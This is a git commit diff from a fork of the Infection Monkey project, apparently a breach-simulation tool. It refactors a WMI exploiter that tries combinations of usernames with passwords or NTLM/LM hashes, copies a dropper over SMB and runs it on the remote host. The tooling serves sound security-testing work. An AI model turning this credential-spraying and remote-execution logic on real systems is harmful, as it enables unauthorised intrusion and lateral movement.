forked from p15670423/monkey
Agent: decouple wmiexec.py from WormConfig object
This commit is contained in:
parent
d7e222c8a8
commit
c932a19b47
|
@ -151,20 +151,6 @@ class Configuration(object):
|
||||||
"""
|
"""
|
||||||
return product(self.exploit_user_list, self.exploit_ssh_keys)
|
return product(self.exploit_user_list, self.exploit_ssh_keys)
|
||||||
|
|
||||||
def get_exploit_user_password_or_hash_product(self):
|
|
||||||
"""
|
|
||||||
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
|
|
||||||
:return:
|
|
||||||
"""
|
|
||||||
cred_list = []
|
|
||||||
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
|
|
||||||
cred_list.append(cred)
|
|
||||||
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
|
|
||||||
cred_list.append(cred)
|
|
||||||
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
|
|
||||||
cred_list.append(cred)
|
|
||||||
return cred_list
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def hash_sensitive_data(sensitive_data):
|
def hash_sensitive_data(sensitive_data):
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
# TODO extract the method in wmiexec.py
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||||
|
|
||||||
exploited = False
|
exploited = False
|
||||||
|
|
|
@ -2,13 +2,14 @@ import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
import traceback
|
import traceback
|
||||||
from typing import List
|
from itertools import product
|
||||||
|
from typing import List, Mapping
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import get_monkey_depth
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||||
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
|
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||||
|
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
|
||||||
@WmiTools.dcom_wrap
|
@WmiTools.dcom_wrap
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
|
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
|
||||||
|
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
||||||
|
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
|
||||||
password,
|
password,
|
||||||
lm_hash,
|
lm_hash,
|
||||||
ntlm_hash,
|
ntlm_hash,
|
||||||
self._config.smb_download_timeout,
|
self.options["smb_download_timeout"],
|
||||||
)
|
)
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
wmi_connection.close()
|
wmi_connection.close()
|
||||||
return False
|
return False
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
|
||||||
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
||||||
"dropper_path": remote_full_path
|
"dropper_path": remote_full_path
|
||||||
} + build_monkey_commandline(
|
} + build_monkey_commandline(
|
||||||
self.host,
|
self.host,
|
||||||
get_monkey_depth() - 1,
|
get_monkey_depth() - 1,
|
||||||
self._config.dropper_target_path_win_32,
|
self.options["dropper_target_path_win_64"],
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
||||||
|
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
|
||||||
|
"""
|
||||||
|
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
|
||||||
|
:return:
|
||||||
|
"""
|
||||||
|
cred_list = []
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
for cred in product(
|
||||||
|
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
|
||||||
|
):
|
||||||
|
cred_list.append(cred)
|
||||||
|
return cred_list
|
||||||
|
|
||||||
|
|
||||||
def _get_credential_string(creds: List) -> str:
|
def _get_credential_string(creds: List) -> str:
|
||||||
cred_strs = [
|
cred_strs = [
|
||||||
(creds[0], "username"),
|
(creds[0], "username"),
|
||||||
|
|
Loading…
Reference in New Issue